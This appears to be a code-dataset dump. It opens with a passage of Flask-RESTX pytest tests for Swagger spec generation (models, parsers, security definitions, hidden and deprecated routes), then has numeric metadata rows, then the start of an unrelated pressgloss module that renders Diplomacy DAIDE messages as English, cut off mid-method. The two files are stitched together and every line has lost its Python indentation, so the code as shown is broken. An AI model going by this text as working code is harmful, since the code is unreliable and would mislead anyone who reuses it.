"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.doc(model="Person")
@api.expect(fields)
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {
"name": {"type": "string"},
"age": {"type": "integer"},
"birthdate": {"type": "string", "format": "date-time"},
},
"type": "object",
}
op = data["paths"]["/model-as-dict/"]["post"]
assert op["responses"]["200"]["schema"]["$ref"] == "#/definitions/Person"
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter == {
"name": "payload",
"in": "body",
"required": True,
"schema": {"$ref": "#/definitions/Person"},
}
assert "description" not in parameter
def test_expect_model_list(self, api, client):
model = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-list/")
class ModelAsDict(restx.Resource):
@api.expect([model])
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {
"name": {"type": "string"},
"age": {"type": "integer"},
"birthdate": {"type": "string", "format": "date-time"},
},
"type": "object",
}
op = data["paths"]["/model-list/"]["post"]
parameter = op["parameters"][0]
assert parameter == {
"name": "payload",
"in": "body",
"required": True,
"schema": {"type": "array", "items": {"$ref": "#/definitions/Person"},},
}
def test_both_model_and_parser_from_expect(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
person = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/with-parser/", endpoint="with-parser")
class WithParserResource(restx.Resource):
@api.expect(parser, person)
def get(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {
"name": {"type": "string"},
"age": {"type": "integer"},
"birthdate": {"type": "string", "format": "date-time"},
},
"type": "object",
}
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 2
parameters = dict((p["in"], p) for p in op["parameters"])
parameter = parameters["query"]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "query"
assert parameter["description"] == "Some param"
parameter = parameters["body"]
assert parameter == {
"name": "payload",
"in": "body",
"required": True,
"schema": {"$ref": "#/definitions/Person"},
}
def test_expect_primitive_list(self, api, client):
@api.route("/model-list/")
class ModelAsDict(restx.Resource):
@api.expect([restx.fields.String])
def post(self):
return {}
data = client.get_specs()
op = data["paths"]["/model-list/"]["post"]
parameter = op["parameters"][0]
assert parameter == {
"name": "payload",
"in": "body",
"required": True,
"schema": {"type": "array", "items": {"type": "string"},},
}
def test_body_model_list(self, api, client):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-list/")
class ModelAsDict(restx.Resource):
@api.expect([fields])
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {
"name": {"type": "string"},
"age": {"type": "integer"},
"birthdate": {"type": "string", "format": "date-time"},
},
"type": "object",
}
op = data["paths"]["/model-list/"]["post"]
parameter = op["parameters"][0]
assert parameter == {
"name": "payload",
"in": "body",
"required": True,
"schema": {"type": "array", "items": {"$ref": "#/definitions/Person"},},
}
def test_expect_model_with_description(self, api, client):
person = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.expect((person, "Body description"))
def post(self):
return {}
data = client.get_specs()
assert "definitions" in data
assert "Person" in data["definitions"]
assert data["definitions"]["Person"] == {
"properties": {
"name": {"type": "string"},
"age": {"type": "integer"},
"birthdate": {"type": "string", "format": "date-time"},
},
"type": "object",
}
op = data["paths"]["/model-as-dict/"]["post"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter == {
"name": "payload",
"in": "body",
"required": True,
"description": "Body description",
"schema": {"$ref": "#/definitions/Person"},
}
def test_authorizations(self, app, client):
restx.Api(
app,
authorizations={
"apikey": {"type": "apiKey", "in": "header", "name": "X-API"}
},
)
# @api.route('/authorizations/')
# class ModelAsDict(restx.Resource):
# def get(self):
# return {}
# def post(self):
# return {}
data = client.get_specs()
assert "securityDefinitions" in data
assert "security" not in data
# path = data['paths']['/authorizations/']
# assert 'security' not in path['get']
# assert path['post']['security'] == {'apikey': []}
def test_single_root_security_string(self, app, client):
api = restx.Api(
app,
security="apikey",
authorizations={
"apikey": {"type": "apiKey", "in": "header", "name": "X-API"}
},
)
@api.route("/authorizations/")
class ModelAsDict(restx.Resource):
def post(self):
return {}
data = client.get_specs()
assert data["securityDefinitions"] == {
"apikey": {"type": "apiKey", "in": "header", "name": "X-API"}
}
assert data["security"] == [{"apikey": []}]
op = data["paths"]["/authorizations/"]["post"]
assert "security" not in op
def test_single_root_security_object(self, app, client):
security_definitions = {
"oauth2": {
"type": "oauth2",
"flow": "accessCode",
"tokenUrl": "https://somewhere.com/token",
"scopes": {
"read": "Grant read-only access",
"write": "Grant read-write access",
},
},
"implicit": {
"type": "oauth2",
"flow": "implicit",
"tokenUrl": "https://somewhere.com/token",
"scopes": {
"read": "Grant read-only access",
"write": "Grant read-write access",
},
},
}
api = restx.Api(
app,
security={"oauth2": "read", "implicit": ["read", "write"]},
authorizations=security_definitions,
)
@api.route("/authorizations/")
class ModelAsDict(restx.Resource):
def post(self):
return {}
data = client.get_specs()
assert data["securityDefinitions"] == security_definitions
assert data["security"] == [{"oauth2": ["read"], "implicit": ["read", "write"]}]
op = data["paths"]["/authorizations/"]["post"]
assert "security" not in op
def test_root_security_as_list(self, app, client):
security_definitions = {
"apikey": {"type": "apiKey", "in": "header", "name": "X-API"},
"oauth2": {
"type": "oauth2",
"flow": "accessCode",
"tokenUrl": "https://somewhere.com/token",
"scopes": {
"read": "Grant read-only access",
"write": "Grant read-write access",
},
},
}
api = restx.Api(
app,
security=["apikey", {"oauth2": "read"}],
authorizations=security_definitions,
)
@api.route("/authorizations/")
class ModelAsDict(restx.Resource):
def post(self):
return {}
data = client.get_specs()
assert data["securityDefinitions"] == security_definitions
assert data["security"] == [{"apikey": []}, {"oauth2": ["read"]}]
op = data["paths"]["/authorizations/"]["post"]
assert "security" not in op
def test_method_security(self, app, client):
api = restx.Api(
app,
authorizations={
"apikey": {"type": "apiKey", "in": "header", "name": "X-API"}
},
)
@api.route("/authorizations/")
class ModelAsDict(restx.Resource):
@api.doc(security=["apikey"])
def get(self):
return {}
@api.doc(security="apikey")
def post(self):
return {}
data = client.get_specs()
assert data["securityDefinitions"] == {
"apikey": {"type": "apiKey", "in": "header", "name": "X-API"}
}
assert "security" not in data
path = data["paths"]["/authorizations/"]
for method in "get", "post":
assert path[method]["security"] == [{"apikey": []}]
def test_security_override(self, app, client):
security_definitions = {
"apikey": {"type": "apiKey", "in": "header", "name": "X-API"},
"oauth2": {
"type": "oauth2",
"flow": "accessCode",
"tokenUrl": "https://somewhere.com/token",
"scopes": {
"read": "Grant read-only access",
"write": "Grant read-write access",
},
},
}
api = restx.Api(
app,
security=["apikey", {"oauth2": "read"}],
authorizations=security_definitions,
)
@api.route("/authorizations/")
class ModelAsDict(restx.Resource):
@api.doc(security=[{"oauth2": ["read", "write"]}])
def get(self):
return {}
data = client.get_specs()
assert data["securityDefinitions"] == security_definitions
op = data["paths"]["/authorizations/"]["get"]
assert op["security"] == [{"oauth2": ["read", "write"]}]
def test_security_nullify(self, app, client):
security_definitions = {
"apikey": {"type": "apiKey", "in": "header", "name": "X-API"},
"oauth2": {
"type": "oauth2",
"flow": "accessCode",
"tokenUrl": "https://somewhere.com/token",
"scopes": {
"read": "Grant read-only access",
"write": "Grant read-write access",
},
},
}
api = restx.Api(
app,
security=["apikey", {"oauth2": "read"}],
authorizations=security_definitions,
)
@api.route("/authorizations/")
class ModelAsDict(restx.Resource):
@api.doc(security=[])
def get(self):
return {}
@api.doc(security=None)
def post(self):
return {}
data = client.get_specs()
assert data["securityDefinitions"] == security_definitions
path = data["paths"]["/authorizations/"]
for method in "get", "post":
assert path[method]["security"] == []
def test_hidden_resource(self, api, client):
@api.route("/test/", endpoint="test", doc=False)
class TestResource(restx.Resource):
def get(self):
"""
GET operation
"""
return {}
@api.hide
@api.route("/test2/", endpoint="test2")
class TestResource2(restx.Resource):
def get(self):
"""
GET operation
"""
return {}
@api.doc(False)
@api.route("/test3/", endpoint="test3")
class TestResource3(restx.Resource):
def get(self):
"""
GET operation
"""
return {}
data = client.get_specs()
for path in "/test/", "/test2/", "/test3/":
assert path not in data["paths"]
resp = client.get(path)
assert resp.status_code == 200
def test_hidden_resource_from_namespace(self, api, client):
ns = api.namespace("ns")
@ns.route("/test/", endpoint="test", doc=False)
class TestResource(restx.Resource):
def get(self):
"""
GET operation
"""
return {}
data = client.get_specs()
assert "/ns/test/" not in data["paths"]
resp = client.get("/ns/test/")
assert resp.status_code == 200
def test_hidden_methods(self, api, client):
@api.route("/test/", endpoint="test")
@api.doc(delete=False)
class TestResource(restx.Resource):
def get(self):
"""
GET operation
"""
return {}
@api.doc(False)
def post(self):
"""POST operation.
Should be ignored
"""
return {}
@api.hide
def put(self):
"""PUT operation. Should be ignored"""
return {}
def delete(self):
return {}
data = client.get_specs()
path = data["paths"]["/test/"]
assert "get" in path
assert "post" not in path
assert "put" not in path
for method in "GET", "POST", "PUT":
resp = client.open("/test/", method=method)
assert resp.status_code == 200
def test_produces_method(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
pass
@api.produces(["application/octet-stream"])
def post(self):
pass
data = client.get_specs()
get_operation = data["paths"]["/test/"]["get"]
assert "produces" not in get_operation
post_operation = data["paths"]["/test/"]["post"]
assert "produces" in post_operation
assert post_operation["produces"] == ["application/octet-stream"]
def test_deprecated_resource(self, api, client):
@api.deprecated
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
pass
def post(self):
pass
data = client.get_specs()
resource = data["paths"]["/test/"]
for operation in resource.values():
assert "deprecated" in operation
assert operation["deprecated"] is True
def test_deprecated_method(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
pass
@api.deprecated
def post(self):
pass
data = client.get_specs()
get_operation = data["paths"]["/test/"]["get"]
assert "deprecated" not in get_operation
post_operation = data["paths"]["/test/"]["post"]
assert "deprecated" in post_operation
assert post_operation["deprecated"] is True
def test_vendor_as_kwargs(self, api, client):
@api.route("/vendor_fields", endpoint="vendor_fields")
class TestResource(restx.Resource):
@api.vendor(integration={"integration1": "1"})
def get(self):
return {}
data = client.get_specs()
assert "/vendor_fields" in data["paths"]
path = data["paths"]["/vendor_fields"]["get"]
assert "x-integration" in path
assert path["x-integration"] == {"integration1": "1"}
def test_vendor_as_dict(self, api, client):
@api.route("/vendor_fields", endpoint="vendor_fields")
class TestResource(restx.Resource):
@api.vendor(
{
"x-some-integration": {"integration1": "1"},
"another-integration": True,
},
{"third-integration": True},
)
def get(self, age):
return {}
data = client.get_specs()
assert "/vendor_fields" in data["paths"]
path = data["paths"]["/vendor_fields"]["get"]
assert "x-some-integration" in path
assert path["x-some-integration"] == {"integration1": "1"}
assert "x-another-integration" in path
assert path["x-another-integration"] is True
assert "x-third-integration" in path
assert path["x-third-integration"] is True
def test_method_restrictions(self, api, client):
@api.route("/foo/bar", endpoint="foo")
@api.route("/bar", methods=["GET"], endpoint="bar")
class TestResource(restx.Resource):
def get(self):
pass
def post(self):
pass
data = client.get_specs()
path = data["paths"]["/foo/bar"]
assert "get" in path
assert "post" in path
path = data["paths"]["/bar"]
assert "get" in path
assert "post" not in path
def test_multiple_routes_inherit_doc(self, api, client):
@api.route("/foo/bar")
@api.route("/bar")
@api.doc(description="an endpoint")
class TestResource(restx.Resource):
def get(self):
pass
data = client.get_specs()
path = data["paths"]["/foo/bar"]
assert path["get"]["description"] == "an endpoint"
path = data["paths"]["/bar"]
assert path["get"]["description"] == "an endpoint"
def test_multiple_routes_individual_doc(self, api, client):
@api.route("/foo/bar", doc={"description": "the same endpoint"})
@api.route("/bar", doc={"description": "an endpoint"})
class TestResource(restx.Resource):
def get(self):
pass
data = client.get_specs()
path = data["paths"]["/foo/bar"]
assert path["get"]["description"] == "the same endpoint"
path = data["paths"]["/bar"]
assert path["get"]["description"] == "an endpoint"
def test_multiple_routes_override_doc(self, api, client):
@api.route("/foo/bar", doc={"description": "the same endpoint"})
@api.route("/bar")
@api.doc(description="an endpoint")
class TestResource(restx.Resource):
def get(self):
pass
data = client.get_specs()
path = data["paths"]["/foo/bar"]
assert path["get"]["description"] == "the same endpoint"
path = data["paths"]["/bar"]
assert path["get"]["description"] == "an endpoint"
def test_multiple_routes_no_doc_same_operationIds(self, api, client):
@api.route("/foo/bar")
@api.route("/bar")
class TestResource(restx.Resource):
def get(self):
pass
data = client.get_specs()
expected_operation_id = "get_test_resource"
path = data["paths"]["/foo/bar"]
assert path["get"]["operationId"] == expected_operation_id
path = data["paths"]["/bar"]
assert path["get"]["operationId"] == expected_operation_id
def test_multiple_routes_with_doc_unique_operationIds(self, api, client):
@api.route(
"/foo/bar", doc={"description": "I should be treated separately"},
)
@api.route("/bar")
class TestResource(restx.Resource):
def get(self):
pass
data = client.get_specs()
path = data["paths"]["/foo/bar"]
assert path["get"]["operationId"] == "get_test_resource_/foo/bar"
path = data["paths"]["/bar"]
assert path["get"]["operationId"] == "get_test_resource"
def test_mutltiple_routes_merge_doc(self, api, client):
@api.route("/foo/bar", doc={"description": "the same endpoint"})
@api.route("/bar", doc={"description": False})
@api.doc(security=[{"oauth2": ["read", "write"]}])
class TestResource(restx.Resource):
def get(self):
pass
data = client.get_specs()
path = data["paths"]["/foo/bar"]
assert path["get"]["description"] == "the same endpoint"
assert path["get"]["security"] == [{"oauth2": ["read", "write"]}]
path = data["paths"]["/bar"]
assert "description" not in path["get"]
assert path["get"]["security"] == [{"oauth2": ["read", "write"]}]
def test_multiple_routes_deprecation(self, api, client):
@api.route("/foo/bar", doc={"deprecated": True})
@api.route("/bar")
class TestResource(restx.Resource):
def get(self):
pass
data = client.get_specs()
path = data["paths"]["/foo/bar"]
assert path["get"]["deprecated"] is True
path = data["paths"]["/bar"]
assert "deprecated" not in path["get"]
@pytest.mark.parametrize("path_name", ["/name/{age}/", "/first-name/{age}/"])
def test_multiple_routes_explicit_parameters_override(self, path_name, api, client):
@api.route("/name/<int:age>/", endpoint="by-name")
@api.route("/first-name/<int:age>/")
@api.doc(
params={
"q": {
"type": "string",
"in": "query",
"description": "Overriden description",
},
"age": {"description": "An age"},
}
)
class ByNameResource(restx.Resource):
@api.doc(params={"q": {"description": "A query string"}})
def get(self, age):
return {}
def post(self, age):
pass
data = client.get_specs()
assert path_name in data["paths"]
path = data["paths"][path_name]
assert len(path["parameters"]) == 1
by_name = dict((p["name"], p) for p in path["parameters"])
parameter = by_name["age"]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "An age"
# Don't duplicate parameters
assert "q" not in by_name
get = path["get"]
assert len(get["parameters"]) == 1
parameter = get["parameters"][0]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "A query string"
post = path["post"]
assert len(post["parameters"]) == 1
parameter = post["parameters"][0]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "Overriden description"
class SwaggerDeprecatedTest(object):
def test_doc_parser_parameters(self, api):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
with pytest.warns(DeprecationWarning):
@api.route("/with-parser/")
class WithParserResource(restx.Resource):
@api.doc(parser=parser)
def get(self):
return {}
assert "parser" not in WithParserResource.get.__apidoc__
assert "expect" in WithParserResource.get.__apidoc__
doc_parser = WithParserResource.get.__apidoc__["expect"][0]
assert doc_parser.__schema__ == parser.__schema__
def test_doc_method_parser_on_class(self, api):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
with pytest.warns(DeprecationWarning):
@api.route("/with-parser/")
@api.doc(get={"parser": parser})
class WithParserResource(restx.Resource):
def get(self):
return {}
def post(self):
return {}
assert "parser" not in WithParserResource.__apidoc__["get"]
assert "expect" in WithParserResource.__apidoc__["get"]
doc_parser = WithParserResource.__apidoc__["get"]["expect"][0]
assert doc_parser.__schema__ == parser.__schema__
def test_doc_body_as_tuple(self, api):
fields = api.model(
"Person",
{
"name": restx.fields.String,
"age": restx.fields.Integer,
"birthdate": restx.fields.DateTime,
},
)
with pytest.warns(DeprecationWarning):
@api.route("/model-as-dict/")
class ModelAsDict(restx.Resource):
@api.doc(body=(fields, "Body description"))
def post(self):
return {}
assert "body" not in ModelAsDict.post.__apidoc__
assert ModelAsDict.post.__apidoc__["expect"] == [(fields, "Body description")]
def test_build_request_body_parameters_schema(self):
parser = restx.reqparse.RequestParser()
parser.add_argument("test", type=int, location="headers")
parser.add_argument("test1", type=int, location="json")
parser.add_argument("test2", location="json")
body_params = [p for p in parser.__schema__ if p["in"] == "body"]
result = restx.swagger.build_request_body_parameters_schema(body_params)
assert result["name"] == "payload"
assert result["required"]
assert result["in"] == "body"
assert result["schema"]["type"] == "object"
assert result["schema"]["properties"]["test1"]["type"] == "integer"
assert result["schema"]["properties"]["test2"]["type"] == "string"
| 32.324946
| 112
| 0.50702
| 10,340
| 105,347
| 5.082302
| 0.038008
| 0.042816
| 0.029933
| 0.040418
| 0.845788
| 0.801735
| 0.766246
| 0.72756
| 0.705695
| 0.682118
| 0
| 0.008006
| 0.331305
| 105,347
| 3,258
| 113
| 32.334868
| 0.73798
| 0.011391
| 0
| 0.690597
| 0
| 0.00078
| 0.199236
| 0.005964
| 0
| 0
| 0
| 0
| 0.228638
| 1
| 0.106516
| false
| 0.011315
| 0.002731
| 0.040968
| 0.201327
| 0.003512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed4b642428eb17107bf42c5f17225efe9382aa11
| 148,999
|
py
|
Python
|
pressgloss/core.py
|
jpowersdevtech/pressgloss
|
dba7f97c8b00db04da54ef79022553ff06fa0737
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2022-02-03T17:09:56.000Z
|
2022-02-07T19:21:15.000Z
|
pressgloss/core.py
|
jpowersdevtech/pressgloss
|
dba7f97c8b00db04da54ef79022553ff06fa0737
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
pressgloss/core.py
|
jpowersdevtech/pressgloss
|
dba7f97c8b00db04da54ef79022553ff06fa0737
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
# -*- coding: utf-8 -*-
"""%pressgloss% library"""
# Standard library imports
import logging
import random
# pressgloss imports
from . import helpers
class PressUtterance:
""" A statement by a Diplomacy Power addressed to other Powers and regarding some in-game topic with a tone """
def __init__(self, daide='', tones=None): # type: (str, []) -> None
"""
Initialize the utterance with a DAIDE expression
:param daide: the press utterance in DAIDE syntax
:type daide: str
:param tones: the tones to use when forming English
:type tones: []
"""
if tones is None:
self.tones = []
else:
self.tones = tones
if daide is None or daide == '':
self.frompower = random.choice(helpers.powerlist)
self.topowers = []
tolist = [curpower for curpower in helpers.powerlist if curpower != self.frompower]
self.topowers = random.sample(tolist, random.randint(1, 4))
contentword = random.choice(['PRP', 'FCT', 'YES', 'REJ', 'HUH', 'BWX', 'CCL'])
self.content = randomFactory(self, None, contentword)
self.daide = self.formDAIDE()
else:
self.daide = daide
thelists = helpers.daide2lists(daide)
if len(thelists) == 4 and thelists[0] == 'FRM':
self.frompower = thelists[1][0]
self.topowers = thelists[2]
self.content = messageFactory(self, None, thelists[3])
else:
self.frompower = ''
self.topowers = []
self.content = None
self.formenglish()
def __eq__(self, other): # type: (PressUtterance) -> bool
"""
Override default equality with a comparison of DAIDE expressions
:param other: the other utterance to compare
:type other: PressUtterance
:return: if these utterances are equal
:rtype: bool
"""
return self.daide.lower() == other.daide.lower()
def __ne__(self, other): # type: (PressUtterance) -> bool
"""
Override default inequality with reference to equality
:param other: the other utterance to compare
:type other: PressUtterance
:return: if these utterances are not equal
:rtype: bool
"""
return not self.__eq__(other)
def formenglish(self, tones=None): # type ([]) -> None
"""
Creates an English expression either using the initial tones or a given new set.
Stores the English in the object as the 'english' attribute.
:param tones: the tones to use when forming English
:type tones: []
"""
if tones is not None and len(tones) > 0:
self.tones = tones
if self.content is None:
self.english = 'Ahem.'
else:
self.english = self.content.formenglish()
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Utterance
:return: the DAIDE message
:rtype: str
"""
return 'FRM (' + self.frompower + ') (' + ' '.join(self.topowers) + ') (' + self.content.formDAIDE() + ')'
class PressMessage:
""" The game-related content of an utterance. Top-level DAIDE class that should never be used directly. """
def __init__(self, utterance, container): # type: (PressUtterance, PressMessage) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
"""
self.utterance = utterance
self.container = container
self.operator = ''
self.details = None
self.english = 'Ahem.'
def __eq__(self, other): # type: (PressMessage) -> bool
"""
Override default equality with a comparison of DAIDE expressions
:param other: the other message to compare
:type other: PressMessage
:return: if these messages are equal
:rtype: bool
"""
return self.utterance.daide.lower() == other.utterance.daide.lower()
def __ne__(self, other): # type: (PressMessage) -> bool
"""
Override default inequality with reference to equality
:param other: the other message to compare
:type other: PressMessage
:return: if these messages are not equal
:rtype: bool
"""
return not self.__eq__(other)
def formenglish(self): # type () -> str
"""
Creates an English expression in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
self.english = helpers.tonetize(self.utterance, self.english)
return self.english
def formsimpleenglish(self): # type: () -> str
"""
Creates a simple English statement, without any context like proposals, negations, etc.
Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
:return: the simple English statement
:rtype: str
"""
self.simpleenglish = 'A DAIDE expression.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return self.operator
class PressFact(PressMessage):
""" The game-related content of a fact. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'FCT'
contentword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR', 'AND', 'ORR', 'IFF'])
self.details = randomFactory(utterance, self, contentword)
elif len(thelists) == 2:
self.operator = thelists[0]
self.details = messageFactory(utterance, self, thelists[1])
def formenglish(self): # type () -> str
"""
Creates an English expression about the fact in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.details is None:
return super().formenglish()
self.english = self.details.formenglish()
if self.container is None:
self.english = helpers.tonetize(self.utterance, self.english)
return self.english
def formsimpleenglish(self): # type: () -> str
"""
Creates a simple English statement, without any context like proposals, negations, etc.
Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
:return: the simple English statement
:rtype: str
"""
self.simpleenglish = self.details.formsimpleenglish()
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'FCT (' + self.details.formDAIDE() + ')'
class PressProposal(PressMessage):
""" The game-related content of a proposal. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'PRP'
contentword = random.choice(['PCE', 'ALY', 'DMZ', 'SLO', 'DRW', 'XDO', 'NOT', 'NAR', 'AND', 'ORR', 'IFF'])
self.details = randomFactory(utterance, self, contentword)
elif len(thelists) == 2:
self.operator = thelists[0]
self.details = messageFactory(utterance, self, thelists[1])
def formenglish(self): # type () -> str
"""
Creates an English expression about the proposal in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.details is None:
return super().formenglish()
self.english = self.details.formenglish()
if self.container is None:
self.english = helpers.tonetize(self.utterance, self.english)
return self.english
def formsimpleenglish(self): # type: () -> str
"""
Creates a simple English statement, without any context like proposals, negations, etc.
Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
:return: the simple English statement
:rtype: str
"""
self.simpleenglish = self.details.formsimpleenglish()
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'PRP (' + self.details.formDAIDE() + ')'
class PressAccept(PressMessage):
""" The game-related content of an acceptance. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'YES'
self.details = randomFactory(utterance, self, 'PRP')
elif len(thelists) == 2:
self.operator = thelists[0]
self.details = messageFactory(utterance, self, thelists[1])
def formenglish(self): # type () -> str
"""
Creates an English expression about the acceptance in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.details is None:
return super().formenglish()
self.english = self.details.formenglish()
if self.container is None:
self.english = helpers.tonetize(self.utterance, self.english)
return self.english
def formsimpleenglish(self): # type: () -> str
"""
Creates a simple English statement, without any context like proposals, negations, etc.
Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
:return: the simple English statement
:rtype: str
"""
self.simpleenglish = 'I accept your proposal.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'YES (' + self.details.formDAIDE() + ')'
class PressReject(PressMessage):
""" The game-related content of a rejection. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'REJ'
self.details = randomFactory(utterance, self, 'PRP')
elif len(thelists) == 2:
self.operator = thelists[0]
self.details = messageFactory(utterance, self, thelists[1])
def formenglish(self): # type () -> str
"""
Creates an English expression about the rejection in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.details is None:
return super().formenglish()
self.english = self.details.formenglish()
if self.container is None:
self.english = helpers.tonetize(self.utterance, self.english)
return self.english
def formsimpleenglish(self): # type: () -> str
"""
Creates a simple English statement, without any context like proposals, negations, etc.
Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
:return: the simple English statement
:rtype: str
"""
self.simpleenglish = 'I reject your proposal.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'REJ (' + self.details.formDAIDE() + ')'
class PressCancel(PressMessage):
""" The game-related content of a cancellation. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'CCL'
self.details = randomFactory(utterance, self, 'PRP')
elif len(thelists) == 2:
self.operator = thelists[0]
self.details = messageFactory(utterance, self, thelists[1])
def formenglish(self): # type () -> str
"""
Creates an English expression about the rejection in the context of a sender, recipients and desired tone.
:return: the English expression
:rtype: str
"""
if self.details is None:
return super().formenglish()
self.english = self.details.formenglish()
if self.container is None:
self.english = helpers.tonetize(self.utterance, self.english)
return self.english
def formsimpleenglish(self): # type: () -> str
"""
Creates a simple English statement, without any context like proposals, negations, etc.
Useful for lists of conjunctions or other contexts in which simplicity is valued over flavor.
:return: the simple English statement
:rtype: str
"""
self.simpleenglish = 'I wish to cancel my last message.'
return self.simpleenglish
def formDAIDE(self): # type () -> str
"""
Create a DAIDE representation of this Message
:return: the DAIDE message
:rtype: str
"""
return 'CCL (' + self.details.formDAIDE() + ')'
class PressHuh(PressMessage):
""" The game-related content of a confusion. """
def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
"""
Initialize the message with an utterance
:param utterance: the press utterance that this message is within the content for
:type utterance: PressUtterance
:param container: the press message that contains this one
:type container: PressMessage
:param thelists: the parsed, nested DAIDE statement
:type thelists: []
"""
super().__init__(utterance, container)
if thelists is None or len(thelists) == 0:
self.operator = 'HUH'
self.details = randomFactory(utterance, self, random.choice(['PRP', 'FCT']))
elif len(thelists) == 2:
self.operator = thelists[0]
self.details = messageFactory(utterance, self, thelists[1])
def formenglish(self): # type () -> str
"""
